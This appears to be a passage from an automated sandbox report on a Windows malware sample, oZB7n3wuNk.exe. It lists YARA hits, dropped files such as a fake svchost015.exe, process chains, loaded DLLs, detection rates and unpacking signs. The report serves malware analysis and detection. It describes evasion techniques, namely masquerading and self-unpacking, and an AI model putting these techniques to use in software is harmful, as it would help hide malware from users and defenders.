File created: C:\Users\user\AppData\Local\Temp\9A25.tmp

Jump to behavior

Source: Yara match	File source: 7.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

Source: unknown

Process created: C:\Windows\explorer.exe

Source: oZB7n3wuNk.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\9A25.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9A25.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: oZB7n3wuNk.exe	ReversingLabs: Detection: 63%
Source: oZB7n3wuNk.exe	Virustotal: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\oZB7n3wuNk.exe "C:\Users\user\Desktop\oZB7n3wuNk.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\birajci C:\Users\user\AppData\Roaming\birajci
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9A25.exe C:\Users\user\AppData\Local\Temp\9A25.exe
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4004 -s 9264
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9A25.exe C:\Users\user\AppData\Local\Temp\9A25.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe	Jump to behavior

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinui.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: applicationframe.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: holographicextensions.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: virtualmonitormanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: abovelockapphost.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: npsm.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.bluelightreduction.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.signals.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorybroker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfplat.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rtworkq.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.security.authentication.web.core.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.data.activities.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.system.launcher.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.ui.shell.windowtabmanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.devices.enumeration.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: devdispitemprovider.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.core.textinput.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windowsudk.shellcommon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dictationmanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: daxexec.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: container.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: batmeter.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: inputswitch.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: prnfldr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: syncreg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: actioncenter.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wscinterop.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wscapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnidui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: networkuxbroker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: werconcpl.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: hcproviders.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ethernetmediamanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dusmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpdshserviceobj.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: portabledevicetypes.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: portabledeviceapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: storageusage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cscobj.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srchadmin.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fhcfg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: efsutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.search.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: synccenter.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ncsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: imapi2.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.system.userprofile.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cloudexperiencehostbroker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: credui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: settingsync.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: settingsynccore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msxml6.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: oZB7n3wuNk.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Unpacked PE file: 0.2.oZB7n3wuNk.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\birajci	Unpacked PE file: 4.2.birajci.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00403245 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00403267 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00401C0A pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_0040321E push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00401C23 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00401C27 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00403235 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00401BF2 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00401BF3 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00401BFE pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_004010A9 push 1A43E3D0h; retf	0_2_004010B3
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_0064D44B push eax; ret	0_2_0064D49A
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_0064CEF5 push 0CEB7905h; retf	0_2_0064CEFA
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_0064B7B2 push 1A43E3D0h; retf	0_2_0064B7BC
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_0064C2BB push edx; retn 0063h	0_2_0064C2C4
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_0064D483 push eax; ret	0_2_0064D49A
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_0064C18D pushad ; iretd	0_2_0064C23C
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A1C71 pushad ; iretd	0_2_007A1CC3
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A1C65 pushad ; iretd	0_2_007A1CC3
